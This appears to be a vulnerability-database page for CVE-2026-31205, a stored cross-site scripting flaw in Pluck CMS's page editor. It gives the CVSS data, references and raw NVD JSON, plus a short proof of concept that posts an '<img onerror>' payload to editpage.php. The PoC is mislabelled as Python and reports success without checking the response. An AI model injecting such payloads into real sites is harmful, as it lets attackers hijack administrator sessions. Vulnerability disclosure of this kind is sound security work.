CVE-2026-31205

Description

Cross Site Scripting vulnerability in Pluck CMS before v.4.7.21dev allows a remote attacker to escalate privileges via the editpage.php and the sanitizePageContent function

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Pluck CMS < v4.7.21dev

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-31205
// This script demonstrates how an attacker might inject a payload.
// The payload targets the page editor functionality.

// Malicious payload designed to bypass basic sanitization
// or exploit gaps in the sanitizePageContent function.
var xssPayload = '<img src=x onerror=alert(1)>';

// Simulate sending the payload to the editpage.php endpoint
// Note: Valid session cookies are required (PR:H)
fetch('/data/inc/editpage.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: 'title=HackedPage&content=' + encodeURIComponent(xssPayload) + '&save=1'
}).then(response => console.log('Payload injected successfully'));

// Wait for an administrator to view the page to trigger the privilege escalation.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31205/
[4] VulDB https://vuldb.com/cve/CVE-2026-31205
[5] https://github.com/pluck-cms/pluck/blob/main/data/inc/editpage.php
[6] https://github.com/pluck-cms/pluck/blob/main/data/inc/functions.all.php#L207
[7] https://github.com/pluck-cms/pluck/issues/141
[8] https://medium.com/@nakah_/pluck-cms-stored-xss-in-page-editor-cve-2026-31205-3b0526743e1d?postPublishedType=initial
[9] https://medium.com/@nakah_/pluck-cms-stored-xss-in-page-editor-cve-2026-31205-3b0526743e1d?postPublishedType=initial

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31205", "sourceIdentifier": "[email protected]", "published": "2026-05-04T14:16:32.863", "lastModified": "2026-05-05T19:44:42.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in Pluck CMS before v.4.7.21dev allows a remote attacker to escalate privileges via the editpage.php and the sanitizePageContent function"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/pluck-cms/pluck/blob/main/data/inc/editpage.php", "source": "[email protected]"}, {"url": "https://github.com/pluck-cms/pluck/blob/main/data/inc/functions.all.php#L207", "source": "[email protected]"}, {"url": "https://github.com/pluck-cms/pluck/issues/141", "source": "[email protected]"}, {"url": "https://medium.com/@nakah_/pluck-cms-stored-xss-in-page-editor-cve-2026-31205-3b0526743e1d?postPublishedType=initial", "source": "[email protected]"}, {"url": "https://medium.com/@nakah_/pluck-cms-stored-xss-in-page-editor-cve-2026-31205-3b0526743e1d?postPublishedType=initial", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}